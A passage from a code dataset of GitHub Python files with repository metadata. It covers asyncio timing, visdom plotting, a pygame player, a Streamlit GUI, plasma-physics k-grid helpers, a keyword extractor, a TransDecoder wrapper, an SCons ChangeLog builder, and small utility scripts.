delta_async = default_timer() - start\n\n # Difference between the two ways.\n diff = delta_multi - delta_async\n\n faster = 'AsyncIO'\n if delta_multi < delta_async:\n faster = 'Multithreading'\n\n # Add table row.\n t.add_row([i, delta_multi, delta_async, abs(diff), faster])\n \n # Print table.\n print(t)\n","repo_name":"ByteByBit/Useful_Python","sub_path":"asyncio/url_fetch/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"38099729926","text":"# module visualizations.py\nfrom datetime import datetime\nimport visdom\n\nclass Visualizations:\n def __init__(self, env_name=None):\n if env_name is None:\n env_name = str(datetime.now().strftime(\"%d-%m %Hh%M\"))\n self.env_name = env_name\n self.vis = visdom.Visdom(env=self.env_name)\n self.loss_win = None\n\n def plot_loss(self, loss, step):\n self.loss_win = self.vis.line(\n [loss],\n [step],\n win=self.loss_win,\n update='append' if self.loss_win else None,\n opts=dict(\n xlabel='Step',\n ylabel='Loss',\n title='Loss (mean per 10 steps)',\n )\n )\n","repo_name":"avshalomc/subtract","sub_path":"visualization.py","file_name":"visualization.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"9566168101","text":"import pygame\nfrom pygame.locals import *\nimport math\n\nfrom class_bullet import ClassBullet\n\n\nbullet_img = pygame.image.load(\"Assets/Bullet.png\")\n\n\nclass ClassPlayer(pygame.sprite.Sprite):\n def __init__(self, life):\n self._pos = [200, 200]\n self._vect_dir = [0, 0]\n self._size = 100\n self._time_to_shoot = 0.5\n self._timer = self._time_to_shoot\n self._death = False\n self.kills = 0\n\n # Load and set the image of the player\n self._img = pygame.image.load(\"Assets/Player.gif\")\n\n self._img_rot = self._img # Set a copy of the original image\n self._rect = self._img_rot.get_rect()\n self._rect.center = self._pos\n self._life = life\n\n # Draw a player image on the screen\n\n def draw(self, surface):\n surface.blit(self._img_rot, self._rect)\n\n # Return position of the player\n\n @property\n def position(self):\n return self._pos\n\n @property\n def rect(self):\n return self._rect\n\n @property\n def life(self):\n return self._life\n\n @life.setter\n def life(self, value):\n self._life = value\n\n @property\n def death(self):\n return self._death\n\n @property\n def kills(self):\n return self._kills\n\n @kills.setter\n def kills(self, value):\n self._kills = value\n\n # Movement of the player\n\n def Movement(self, speed): # Update player actions\n if pygame.key.get_pressed()[K_w]: # Direction of rect in Y axis\n self._vect_dir[1] = -1\n elif pygame.key.get_pressed()[K_s]:\n self._vect_dir[1] = 1\n else:\n self._vect_dir[1] = 0\n\n if pygame.key.get_pressed()[K_a]: # Direction of rect in X axis\n self._vect_dir[0] = -1\n elif pygame.key.get_pressed()[K_d]:\n self._vect_dir[0] = 1\n else:\n self._vect_dir[0] = 0\n\n # Apply the movemento to the position\n self._pos[0] += self._vect_dir[0]*speed\n self._pos[1] += self._vect_dir[1]*speed\n\n self._rect.center = self._pos\n\n if self._life <= 0:\n self._death = True\n\n # Rotate player respectively to position of mouse\n\n def Rotation_Shoot(self, pos_of_mouse, bullet_speed, dt, bullet_list):\n # Vector of mouse relative to player\n xp, yp = pos_of_mouse[0] - self._pos[0], pos_of_mouse[1] - self._pos[1]\n\n # Get angle of mouse relative to player\n angle = 360 - math.atan2(yp, xp)*180/math.pi\n\n self._img_rot = pygame.transform.rotate(\n self._img, angle) # Set a rotation on a imagen\n self._rect = self._img_rot.get_rect()\n self._rect.center = self._pos\n\n # Instantiate a bullet\n self._timer -= dt\n\n if (pygame.mouse.get_pressed() == (1, 0, 0)) and self._timer <= 0:\n dir_normalized = (xp/math.hypot(xp, yp), yp/math.hypot(xp, yp))\n\n bullet_list.append(ClassBullet(\n bullet_img, bullet_speed, angle, self._pos.copy(), dir_normalized))\n\n self._timer = self._time_to_shoot\n","repo_name":"Keller-Javi/First-Game-in-Pygames","sub_path":"class_player.py","file_name":"class_player.py","file_ext":"py","file_size_in_byte":3148,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9124410915","text":"\"\"\"\nStream lit GUI for Generator Algorithms\n\"\"\"\n\n# Imports\n# import os\n# import cv2\nimport streamlit as st\n# import json\n# import subprocess\n# import functools\n\nfrom Algorithms.GeneratorAlgos.RandomGenerator import *\n\n# Main Functions\ndef main_GeneratorAlgos():\n SUBAPP_MODES = config_subapp[\"ALGORITHMS\"]\n\n # Create Sidebar\n selected_box = st.sidebar.selectbox(\n 'Choose Generator Algorithm',\n tuple(\n SUBAPP_MODES\n )\n )\n\n # Add Functions\n correspondingFuncName = selected_box.replace(' ', '_').lower()\n if correspondingFuncName in globals().keys():\n globals()[correspondingFuncName]()\n\n#############################################################################################################################\n# Repo Based Vars\n\n\n# Util Vars\n\n\n# Util Functions\n\n\n# Main Functions\n\n\n# UI Functions\ndef UI_RandomFrequencyDistribution():\n USERINPUT_numRange = st.slider(\"Select Random Value Range\", 1, 100, (1, 5), 1)\n USERINPUT_nframes = st.number_input(\"Select Number of Values to Generate\", 1, 500, 10, 1)\n USERINPUT_saveFPS = USERINPUT_nframes / DEFAULT_VIDEO_DURATION\n\n if st.button(\"Generate\"):\n # Process Inputs\n Is = RandomFrequencyDistribution_Vis(USERINPUT_numRange, USERINPUT_nframes, 'Random Frequency Distribution')\n\n # Display Outputs\n st.markdown(\"## Generated Random Frequency Distribution\")\n VideoUtils.SaveFrames2Video(Is, PATHS[\"default\"][\"save\"][\"video\"], USERINPUT_saveFPS)\n VideoUtils.FixVideoFile(PATHS[\"default\"][\"save\"][\"video\"], PATHS[\"default\"][\"save\"][\"video_converted\"])\n # Display Animation Video\n st.video(PATHS[\"default\"][\"save\"][\"video_converted\"])\n\ndef UI_Random2DPoints():\n col1, col2 = st.columns(2)\n USERINPUT_pointXBounds = col1.slider(\"Select X Values Bound\", 1, 100, (1, 5), 1)\n USERINPUT_pointYBounds = col2.slider(\"Select Y Values Bound\", 1, 100, (1, 5), 1)\n USERINPUT_nframes = st.number_input(\"Select Number of Points to Generate\", 1, 500, 10, 1)\n USERINPUT_saveFPS = USERINPUT_nframes / DEFAULT_VIDEO_DURATION\n\n if st.button(\"Generate\"):\n # Process Inputs\n Is = Random2DPointsGenerator_Vis([USERINPUT_pointXBounds, USERINPUT_pointYBounds], USERINPUT_nframes, 'Random 2D Points')\n\n # Display Outputs\n st.markdown(\"## Generated Random 2D Points\")\n VideoUtils.SaveFrames2Video(Is, PATHS[\"default\"][\"save\"][\"video\"], USERINPUT_saveFPS)\n VideoUtils.FixVideoFile(PATHS[\"default\"][\"save\"][\"video\"], PATHS[\"default\"][\"save\"][\"video_converted\"])\n # Display Animation Video\n st.video(PATHS[\"default\"][\"save\"][\"video_converted\"])\n\ndef UI_Random3DPoints():\n col1, col2, col3 = st.columns(3)\n USERINPUT_pointXBounds = col1.slider(\"Select X Values Bound\", 1, 100, (1, 5), 1)\n USERINPUT_pointYBounds = col2.slider(\"Select Y Values Bound\", 1, 100, (1, 5), 1)\n USERINPUT_pointZBounds = col3.slider(\"Select Z Values Bound\", 1, 100, (1, 5), 1)\n USERINPUT_nframes = st.number_input(\"Select Number of Points to Generate\", 1, 500, 10, 1)\n USERINPUT_saveFPS = USERINPUT_nframes / DEFAULT_VIDEO_DURATION\n\n if st.button(\"Generate\"):\n # Process Inputs\n Is = Random3DPointsGenerator_Vis([USERINPUT_pointXBounds, USERINPUT_pointYBounds, USERINPUT_pointZBounds], USERINPUT_nframes, 'Random 3D Points')\n\n # Display Outputs\n st.markdown(\"## Generated Random 3D Points\")\n VideoUtils.SaveFrames2Video(Is, PATHS[\"default\"][\"save\"][\"video\"], USERINPUT_saveFPS)\n VideoUtils.FixVideoFile(PATHS[\"default\"][\"save\"][\"video\"], PATHS[\"default\"][\"save\"][\"video_converted\"])\n # Display Animation Video\n st.video(PATHS[\"default\"][\"save\"][\"video_converted\"])\n\nRANDOMGENERATOR_VISUALISAITON_MAP = {\n \"Random Frequency Distribution\": UI_RandomFrequencyDistribution,\n \"Random 2D Points\": UI_Random2DPoints,\n \"Random 3D Points\": UI_Random3DPoints\n}\n\n# Repo Based Functions\ndef random_generators():\n # Title\n st.header(\"Random Generators\")\n\n # Load Inputs\n USERINPUT_VisChoice = st.selectbox(\"Select Visualization Type\", list(RANDOMGENERATOR_VISUALISAITON_MAP.keys()))\n\n # Process Inputs\n RANDOMGENERATOR_VISUALISAITON_MAP[USERINPUT_VisChoice]()\n \n#############################################################################################################################\n# Driver Code\nmain_GeneratorAlgos()","repo_name":"KausikN/AlgoVis","sub_path":"StreamLitGUI/apps/apps_GeneratorAlgos.py","file_name":"apps_GeneratorAlgos.py","file_ext":"py","file_size_in_byte":4409,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"33873016229","text":"from read_wout import *\nimport numpy as np\n\ndef kGrid(equil=None, psitor=0.5, y0=14.14, jtwist=-1, nx=100, ny=64):\n \n xv, yv = np.meshgrid(get_akx(equil, psitor, y0, nx, jtwist),\\\n get_aky(ny, y0))\n # plot ccw path\n fig, ax = plt.subplots()\n ax.set_xlim((xv.min(),xv.max()))\n ax.set_ylim((yv.min(),yv.max()))\n ax.set_xlabel('$k_y\\\\rho_{r}$')\n ax.set_ylabel('$k_x\\\\rho_{r}$')\n ax.scatter(xv.flatten(),yv.flatten(), color='red', marker='.', cmap=\"RdYlGn\")\n plt.show()\n\n\ndef twist_and_shift_geo_fac(equil=None, psitor=0.5):\n\n dxdpsi_sign = -1. # Ni idea por qué. Debería ser igual a sign_toroidal_flux\n dydalpha_sign = 1.\n dydalpha = dydalpha_sign*rhotor(psitor)\n drhodpsi = dxdpsi_sign*sign_torflux(equil)/rhotor(psitor)\n dxdpsi = dxdpsi_sign*sign_torflux(equil)/rhotor(psitor)\n\n return -2.*pi*get_shat(equil, psitor)*\\\n (1/get_iota(equil, psitor))*\\\n drhodpsi*dydalpha/(dxdpsi*rhotor(psitor))\n\ndef get_naky(ny=100):\n return (ny-1)/3 + 1\n\ndef get_nakx(nx=64):\n return 2*((nx-1)/3) + 1\n\ndef get_aky(ny=100, y0=10.0):\n aky = empty(get_naky(ny),dtype='float')\n dky = get_dky(y0)\n for iky in arange(0, get_naky(ny)):\n aky[iky] = float(iky)*dky\n return aky\n\ndef get_akx(equil=None, psitor=0.49, y0=10.0, nx=64, jtwist=-1):\n # get the ikx index corresponding to kx_max\n ikx_max = int(get_nakx(nx)/2+1)\n\n # get the total number of ky values, including negative ky\n #naky_all = 2*get_naky(ny)-1\n\n # kx goes from zero to kx_max down to zero...\n akx = empty(get_nakx(nx), dtype='float')\n dkx = get_dkx(equil, psitor, y0, nx)\n \n for ikx in arange(0, ikx_max):\n akx[ikx] = float(ikx)*get_dkx(equil, psitor, y0, nx, jtwist)\n \n # and then from -kx_max to -|kx_min|\n for ikx in arange(ikx_max, get_nakx(nx)):\n akx[ikx] = float(ikx-get_nakx(nx))*get_dkx(equil, psitor, y0, nx, jtwist)\n\n return akx\n\ndef get_dky(y0=None):\n return 1.0/y0\n\ndef get_dkx(equil=None, psitor=0.49, y0=10.0, nx=64, jtwist=-1):\n if abs(get_shat(equil, psitor)) <= shat_zero():\n dkx = get_dky(y0) / float(get_jtwist())\n else:\n dkx = get_dky(y0) * abs(twist_and_shift_geo_fac(equil, psitor))/\\\n float(get_jtwist(equil, psitor, jtwist))\n return dkx\n\ndef shat_zero():\n return 1E-2\n\ndef get_jtwist(equil=None, psitor=None, jtwist=-1):\n if (jtwist < 1):\n jtwist = max(1,int(abs(twist_and_shift_geo_fac(equil, psitor))+0.5))\n return jtwist\n\n\n\n","repo_name":"mabarnes/stella","sub_path":"stellapy/stellapy_old/twist_and_shift.py","file_name":"twist_and_shift.py","file_ext":"py","file_size_in_byte":2536,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"22727813701","text":"from multiprocessing import Process\n\nfrom user.aid_mid import AidMid\nfrom user.userinfo import UserInfo\n\nfrom downloader.get_arcurl import GetAid\nfrom downloader.get_video_address import GetVideoURL\nfrom downloader.save_video import SaveVideo\nfrom logs.log import Log\n\n\nclass Scheduler(object):\n @staticmethod\n def aid_mid():\n AidMid().run()\n\n @ staticmethod\n def user_info():\n UserInfo().run()\n\n @staticmethod\n def downloader():\n arcurl = GetAid().get_aid()\n get_video = GetVideoURL(arcurl)\n current_url, video_title, video_url_list = get_video.run()\n SaveVideo(current_url, video_title, video_url_list).run()\n\n def run(self):\n p1 = Process(target=self.aid_mid)\n p1.start()\n\n p2 = Process(target=self.user_info)\n p2.start()\n\n # p3 = Process(target=self.downloader) #\n # p3.start()\n\n\nif __name__ == '__main__':\n scheduler = Scheduler()\n scheduler.run()\n","repo_name":"kclambda/bilibili","sub_path":"scheduler.py","file_name":"scheduler.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"18097239543","text":"import re\nfrom nltk import RegexpParser, pos_tag\n\nclass AnahtarKelimeler(object):\n def __init__(self, corpus=None, stop_words=[], alpha=0.5):\n if alpha < 0.0 or alpha > 1.0:\n raise ValueError(\"Alpha 0 ile 1 arasında olmalıdır.\")\n self.stop_words = stop_words\n stop_word_regex_list = []\n for word in self.stop_words:\n word_regex = r'\\b' + word + r'(?![\\w-])'\n stop_word_regex_list.append(word_regex)\n self.stop_word_pattern = re.compile('|'.join(stop_word_regex_list), re.IGNORECASE)\n self.corpus = corpus\n self.alpha = alpha\n self.parser = RegexpParser('''\n KEYWORDS: {
    ? * +}\n P: {}\n V: {}\n PHRASES: {

    }\n ACTIONS: { *}\n ''')\n\n def sayi_mi(self, s):\n try:\n float(s) if '.' in s else int(s)\n return True\n except ValueError:\n return False\n\n def _cumleleri_ayir(self, metin):\n cumle_bolucu = re.compile(u'[.!?,;:\\t\\\\\\\\\"\\\\(\\\\)\\\\\\'\\u2019\\u2013\\n]|\\\\s\\\\-\\\\s')\n cumleler = cumle_bolucu.split(metin)\n return cumleler\n\n def _ifadeleri_ayir(self, cumleler):\n ifade_listesi = []\n for c in cumleler:\n tmp = re.sub(self.stop_word_pattern, '|', c.strip())\n ifadeler = tmp.split(\"|\")\n for ifade in ifadeler:\n ifade = ifade.strip().lower()\n if ifade != \"\":\n ifade_listesi.append(ifade)\n ifade_listesi_yeni = []\n for p in ifade_listesi:\n etiketler = pos_tag(self._kelime_ayir(p))\n if etiketler != []:\n parcalar = self.parser.parse(etiketler)\n for subtree in parcalar.subtrees(filter=lambda t: t.label() == 'KEYWORDS'):\n anahtar_kelime = ' '.join([i[0] for i in subtree])\n ifade_listesi_yeni.append(anahtar_kelime)\n\n return ifade_listesi_yeni\n\n\n def _kelime_ayir(self, metin):\n bolumleyici = re.compile('[^a-zA-Z0-9_\\\\+\\\\-/]')\n kelimeler = []\n for tek_kelime in bolumleyici.split(metin):\n mevcut_kelime = tek_kelime.strip().lower()\n if mevcut_kelime != '' and not self.sayi_mi(mevcut_kelime):\n kelimeler.append(mevcut_kelime)\n return kelimeler\n\n @property\n def _corpus_anahtar_kelimeleri(self):\n if self.corpus:\n cumleler = self._cumleleri_ayir(self.corpus)\n return self._ifadeleri_ayir(cumleler)\n else:\n return None\n\n\n def kelime_skorlarini_hesapla(self, ifade_listesi):\n kelime_sikligi = {}\n kelime_derecesi = {}\n for ifade in ifade_listesi:\n kelime_listesi = self._kelime_ayir(ifade)\n kelime_listesi_uzunlugu = len(kelime_listesi)\n kelime_listesi_derecesi = kelime_listesi_uzunlugu - 1\n for kelime in kelime_listesi:\n kelime_sikligi.setdefault(kelime, 0)\n kelime_sikligi[kelime] += 1\n kelime_derecesi.setdefault(kelime, 0)\n kelime_derecesi[kelime] += kelime_listesi_derecesi\n for madde in kelime_sikligi:\n kelime_derecesi[madde] = kelime_derecesi[madde] + kelime_sikligi[madde]\n kelime_skoru = {}\n for madde in kelime_sikligi:\n kelime_skoru.setdefault(madde, 0)\n kelime_skoru[madde] = kelime_derecesi[madde] / (kelime_sikligi[madde] * 1.0)\n return kelime_skoru\n\n\n @property\n def _corpus_kelime_skorlari(self):\n corp_anahtar_kelimeleri = self._corpus_anahtar_kelimeleri\n if corp_anahtar_kelimeleri:\n kelime_skorlari = self.kelime_skorlarini_hesapla(corp_anahtar_kelimeleri)\n anahtar_kelime_adaylari = {}\n for ifade in corp_anahtar_kelimeleri:\n anahtar_kelime_adaylari.setdefault(ifade, 0)\n kelime_listesi = self._kelime_ayir(ifade)\n aday_skoru = 0\n for kelime in kelime_listesi:\n aday_skoru += kelime_skorlari[kelime]\n anahtar_kelime_adaylari[ifade] = aday_skoru\n return anahtar_kelime_adaylari\n else:\n return None\n\n def ifade_skorlama(self, ifade_listesi, kelime_skoru):\n corp_skorlari = self._corpus_kelime_skorlari\n anahtar_kelime_adaylari = {}\n for ifade in ifade_listesi:\n anahtar_kelime_adaylari.setdefault(ifade, 0)\n kelime_listesi = self._kelime_ayir(ifade)\n aday_skoru = 0\n for kelime in kelime_listesi:\n aday_skoru += kelime_skoru[kelime]\n if corp_skorlari:\n anahtar_kelime_adaylari[ifade] = (1-self.alpha)*aday_skoru + (self.alpha)*(corp_skorlari[ifade] if ifade in corp_skorlari else 0.0)\n else:\n anahtar_kelime_adaylari[ifade] = aday_skoru\n return anahtar_kelime_adaylari\n\n def anahtar_kelimeleri_al(self, metin, n=20):\n cumle_listesi = self._cumleleri_ayir(metin)\n ifade_listesi = self._ifadeleri_ayir(cumle_listesi)\n kelime_skorlari = self.kelime_skorlarini_hesapla(ifade_listesi)\n anahtar_kelime_adaylari = self.ifade_skorlama(ifade_listesi, kelime_skorlari)\n return sorted(anahtar_kelime_adaylari.items(), key=lambda x: x[1], reverse=True)[:n]\n","repo_name":"tuecyz/TurkceMetinOzeti","sub_path":"ingilizceAnahtar.py","file_name":"ingilizceAnahtar.py","file_ext":"py","file_size_in_byte":5508,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"30770900164","text":"#!/usr/bin/python\n#coding: utf-8\n\nfrom json import *\n\nclass User():\n def __init__(self, username):\n self.username = username # unique flag for each user\n self.email = \"\" # maybe some user do not show their email address\n self.fullname = \"\"\n self.photourl = \"\"\n self.repos = [] # repositories the user own\n self.homepage = \"\" # some users show their own website address\n self.homelocation = \"\" # users' location information\n self.jointime = \"\" #\n self.worksfor = \"\" # work team\n self.orgnizations = [] # orgnizations, maybe more than one\n self.followers = [] # will store User() objects of followers\n self.following = [] # ..\n self.starred = [] # repositories the user starred\n self.hashcode = hash(username)\n # in Github, the username is different from each other\n\n def set_username(self, username):\n self.username = username\n\n # the content of user_dict could be collected from https://github.com/username?tab=repositories\n def set_basic_information(self, user_dict):\n self.email = user_dict['email']\n self.fullname = user_dict['fullname']\n self.photourl = user_dict['image']\n self.homelocation = user_dict['homelocation']\n self.homepage = user_dict['homepage']\n self.worksfor = user_dict['worksfor']\n self.orgnizations = user_dict['orgnizations']\n self.jointime = user_dict['jointime']\n #self.repos = user_dict['repositories']\n\n # the follow information would be collected from other related pages: star, following, followers\n #self.followers\n #self.following\n #self.starred\n def set_followers(self, followers):\n self.followers = followers\n\n def set_following(self, following):\n self.following = following\n\n def set_starred(self, starred):\n self.starred = starred\n\n # use to get user information\n def get_followers(self):\n if self.followers is None:\n return []\n return self.followers\n\n def get_following(self):\n if self.following is None:\n return []\n return self.following\n\n def get_starred(self):\n if self.starred is None:\n return []\n return self.starred\n\n def get_username(self):\n return self.username\n\n def get_dict(self):\n self.dict = {'username': self.username, \\\n 'email': self.email, \\\n 'fullname': self.fullname,\\\n 'image': self.photourl, \\\n 'homelocation':self.homelocation,\\\n 'homepage': self.homepage, \\\n 'worksfor': self.worksfor, \\\n 'orgnizations':self.orgnizations, \\\n 'jointime': self.jointime, \\\n 'repositories':self.repos, \\\n 'followers': self.followers, \\\n 'following': self.following, \\\n 'starred': self.starred, \\\n 'hashcode': self.hashcode}\n return self.dict\n\n # make it easier to write to files\n def to_json(self):\n self.get_dict()\n return JSONEncoder().encode(self.dict)\n\n# There is a little different between personal user and orgnization user\n# html tags

    ... maybe easier to be found and handle\nclass OrgnizationUser(User):\n def __init__(self, username):\n User.__init__(self,username)\n self.people = []\n self.website_url = []\n","repo_name":"life-fuzzer/NewOne","sub_path":"Objs/GitHubUser.py","file_name":"GitHubUser.py","file_ext":"py","file_size_in_byte":3807,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"39170868944","text":"#6064번 카잉 달력\nimport sys\ninput = sys.stdin.readline\nfrom math import gcd\nif __name__ == \"__main__\":\n t = int(input())\n for i in range(t) : \n m,n,x,y = map(int,input().split())\n common_multiple = (m*n)//gcd(m,n)\n num = 0\n answer = -1\n while m*num+x <= common_multiple : \n if (m*num+x-1)%n+1 == y : \n answer = m*num+x\n break\n num += 1\n print(answer)\n","repo_name":"tomy9729/Algorithm","sub_path":"BaekJoon/Silver/1/6064번 카잉 달력.py","file_name":"6064번 카잉 달력.py","file_ext":"py","file_size_in_byte":401,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"13626604735","text":"#!/usr/bin/env python\nimport re,os,subprocess,sys\nfrom uuid import uuid4\nsys.path.append(os.path.dirname(__file__))\nimport fasta_mini_han\n\ncodes = ['universal','Euplotes','Tetrahymena','Candida','Acetabularia']\nclass pkg():\n\t\"\"\"predict transcript's amino acid sequences\n\n\t:param args: args include\n\t:type update: True\n\t\"\"\"\n\tdef __init__(self, args={}):\n\t\t\"add all options var into self\"\n\t\tself.notes = []\n\t\tself.args = {}\n\t\tself.args.update(args)\n\t\tself.env = {\n\t\t\t'cmd_path':os.path.join(os.path.dirname(__file__),'../../util/transdecoder/')\n\t\t}\n\t\t# addtion\n\n\tdef res(self):\n\t\t\"for module result, save a tmp fasta to execute transdecoder\"\n\t\t#self.args['tmp'] = self.args['tmp'] or os.path.split(__file__)[0]\n\t\tcmd_path = os.path.abspath(self.args.get('cmd_path') or self.env['cmd_path'])\n\t\to_path = os.getcwd()\n\t\tos.chdir(self.args['tmp'])\n\t\tfn = '%s.fa' % uuid4().hex\n\t\tf_log = open(fn+'.log','w')\n\n\t\t# save file\n\t\topen(fn,'w').write(self.args['fasta'].read())\n\t\t# LongOrfs\n\t\tt_srp = [os.path.join(cmd_path,'TransDecoder.LongOrfs'),'-t',fn]\n\t\tif self.args.get('code') and (self.args['code'] != 'universal'):\n\t\t\tt_srp.extend(['-G',self.args['code']])\n\t\tif self.args.get('sense'):\n\t\t\tt_srp.extend(['-S'])\n\t\tos.system(' '.join(t_srp))\n\t\tp = subprocess.Popen(t_srp, stdout=subprocess.PIPE,stderr=subprocess.PIPE)\n\t\tf_log.write(p.stdout.read())\n\t\t# Predict\n\t\tt_srp = [os.path.join(cmd_path,'TransDecoder.Predict'),'-t',fn]\n\t\tif not self.args.get('multi'):\n\t\t\tt_srp.extend(['--single_best_orf'])\n\t\tos.system(' '.join(t_srp))\n\t\tp = subprocess.Popen(t_srp, stdout=subprocess.PIPE,stderr=subprocess.PIPE)\n\t\tf_log.write(p.stdout.read())\n\t\tf_log.close()\n\t\t# parse fasta\n\t\tres = []\n\t\tre_name = re.compile('(\\w+):(\\d+)-(\\d+)\\(([-\\+])\\)')\n\t\tfor i in fasta_mini_han.fasta_mini_han(open(fn+'.transdecoder.pep')):\n\t\t\tt_re = re_name.findall(i.name)[0]\n\t\t\tt_rng = map(int,t_re[1:3])\n\t\t\tt_strd = 0 if t_re[3]=='+' else 1\n\t\t\tres.append({'name':t_re[0],'seq':i.seq,'from':t_rng[t_strd],'to':t_rng[t_strd-1]})\n\t\tif not res:\n\t\t\tfor i in ['','.log']:\n\t\t\t\tos.rename(fn+i,'err_'+fn+i)\n\t\t#\treturn {'log':open(fn+'.log').read()}\n\t\t# remove files\n\t\tos.system('rm -rf %s*' % fn)\n\t\tos.chdir(o_path)\n\t\treturn res\n\n\tdef out(self):\n\t\t\"for commandline output, default use fasta output\"\n\t\tres = self.res()\n\t\tfor i in res:\n\t\t\tt_name = '%s|from|%s|to|%s' % (i['name'],i['from'],i['to'])\n\t\t\tself.args['out'].write(fasta_mini_han.fasta_mini_han.seq_o(t_name,i['seq']).fasta())\n\n\t\tself.args['out'].close()\n\nif __name__ == '__main__':\n\timport argparse\n\tparser = argparse.ArgumentParser(description = pkg.__doc__, formatter_class = argparse.ArgumentDefaultsHelpFormatter)\n\tparser.add_argument('-i','--fasta',help='fasta file input',metavar='fasta', type=argparse.FileType('r'),default=sys.stdin)\n\tparser.add_argument('-o','--out',help='peptide output file',metavar='out', type=argparse.FileType('w'),default=sys.stdout)\n\tparser.add_argument('-c','--code',help='select a genetic code in %s, default use \"universal\".' % ','.join(codes), metavar='code',default='universal',choices=codes)\n\tparser.add_argument('-m','--multi',help='output multiple amino acid if has', action='store_true', default=False)\n\tparser.add_argument('-s','--sense',help='only output sense strand', action='store_true', default=False)\n\tparser.add_argument('-t','--tmp',help='tmp dir for cmd execute', default='./')\n\tparser.add_argument('-p','--cmd_path',help='transdecoder dir')\n\targs = parser.parse_args()\n\n\ta=pkg(vars(args))\n\ta.out()\n","repo_name":"wyubin/dockers","sub_path":"nginx_flask_python2/uwsgi/project/python/share_app/share_util/transdecoder.py","file_name":"transdecoder.py","file_ext":"py","file_size_in_byte":3463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"27439114667","text":"## \n## my_car.py\n## ianpasm(kno30826@gmail.com)\n## 2017-11-21 17:02:24\n## \n \n#!/usr/bin/env python3\n# coding=utf-8\n\nfrom car import Car\n\nmy_new_car = Car('audi','a7',2017)\nprint(my_new_car.get_descriptive_name())\n\nmy_new_car.odometer_reading = 23\nmy_new_car.read_odometer()\n","repo_name":"i0Ek3/PythonCrashCourse","sub_path":"code/part1/37_import_class/my_car.py","file_name":"my_car.py","file_ext":"py","file_size_in_byte":274,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"15007613226","text":"##Building the ChangeLog\nimport os, sys, string\nfrom time import sleep\nfrom SCons.Util import WhereIs\npj = os.path.join\n\nImport('ves_pkg', 'baseEnv', 'buildDir', 'RootDir')\nenv = ves_pkg.getEnv().Clone()\n\n##Base parameters.\nrelativeDir = pj('share', 'docs', 'changelog')\nbaseDir = pj('#', relativeDir)\n\nsrcs = Split(\"\"\"\n ChangeLog\n\"\"\")\n\nchLogSrc = map(lambda s: pj(baseDir, \"%s.xml\" %(s)), srcs)\nchLogTarget = map(lambda s: pj(baseDir, \"%s\" %(s)), srcs)\n\nif env[ 'SVN_Previous_Date' ] != '':\n sys.stdout.write(\"Generating the ChangeLog....\\n\")\nelse:\n sys.stdout.write(\"No SVN_Previous_Date defined\")\n sys.exit(0)\n \n# Find svn\nsys.stdout.write(\"searching for svn...\\n\")\nsvn_cmd = WhereIs('svn')\n\nif None == svn_cmd:\n sys.stdout.write(\"Could not find svn. Please make sure svn is in your PATH.\\n\")\n sys.exit(0)\nelse:\n sys.stdout.write(\"Found svn\\n\")\n\n# Find xsltproc\nsys.stdout.write(\"searching for xsltproc...\\n\")\nxsltproc_cmd = WhereIs('xsltproc')\n\nif None == svn_cmd:\n sys.stdout.write(\"Could not find xsltproc. Please make sure xsltproc is in your PATH.\\n\")\n sys.exit(0)\nelse:\n sys.stdout.write(\"Found xsltproc\\n\")\n\nos.system(\"%s log --xml --verbose -r'{'%s'}':'HEAD' %s > ChangeLog.xml\" % (svn_cmd, env['SVN_Previous_Date'], RootDir))\n\nxsltAction = '%s -o ${TARGET.abspath} %s/external/svn2cl/svn2cl.xsl ${SOURCE.abspath}' % (xsltproc_cmd, RootDir)\nxsltBuilder = Builder(action = xsltAction, single_source = True, suffix = \"\", chdir = relativeDir)\n\nenv.Append(BUILDERS = {'xslt': xsltBuilder})\nenv.xslt(target = chLogTarget, source = chLogSrc)\n\n#./external/svn2cl/svn2cl.sh --linelen=80 --break-before-msg=1 --title=\"VE-Suite ChangeLog\" --group-by-day --separate-daylogs --html . --revision HEAD:14782\n\nsys.stdout.write(\"ChangeLog and ChangeLog.xml files are successfully created\\n\")\n\n","repo_name":"multitudinous/ve-suite","sub_path":"share/docs/changelog/SConscript","file_name":"SConscript","file_ext":"","file_size_in_byte":1820,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"4434810179","text":"import string\nfrom collections import deque\n\nalphabet = string.ascii_lowercase + \" \"\n\nQ = deque(alphabet)\nQ.rotate(-3)\n\nword = \"this is a caesar cypher\"\n\nfor ch in word:\n q_ind = alphabet.index(ch)\n print(ch, Q[q_ind])\n","repo_name":"pekka-aleksi/python-snippets","sub_path":"caesar.py","file_name":"caesar.py","file_ext":"py","file_size_in_byte":225,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"73837347000","text":"import datetime\nfrom jinja2 import Environment, FileSystemLoader\n\nenv = Environment(\n loader=FileSystemLoader(\"sql/in\"), trim_blocks=True, lstrip_blocks=True\n)\n\ntemplate = env.get_template(\"a.sql\")\n\nstart_date = \"2020-01-02\"\nend_date = (\n datetime.date.fromisoformat(start_date) + datetime.timedelta(days=30)\n).isoformat()\n\nwith open(\"sql/out/a.sql\", \"w\") as f:\n f.write(\n template.render(\n tbl=\"sold\",\n vars=[\"carrot\", \"date\"],\n start_date=start_date,\n end_date=end_date,\n )\n 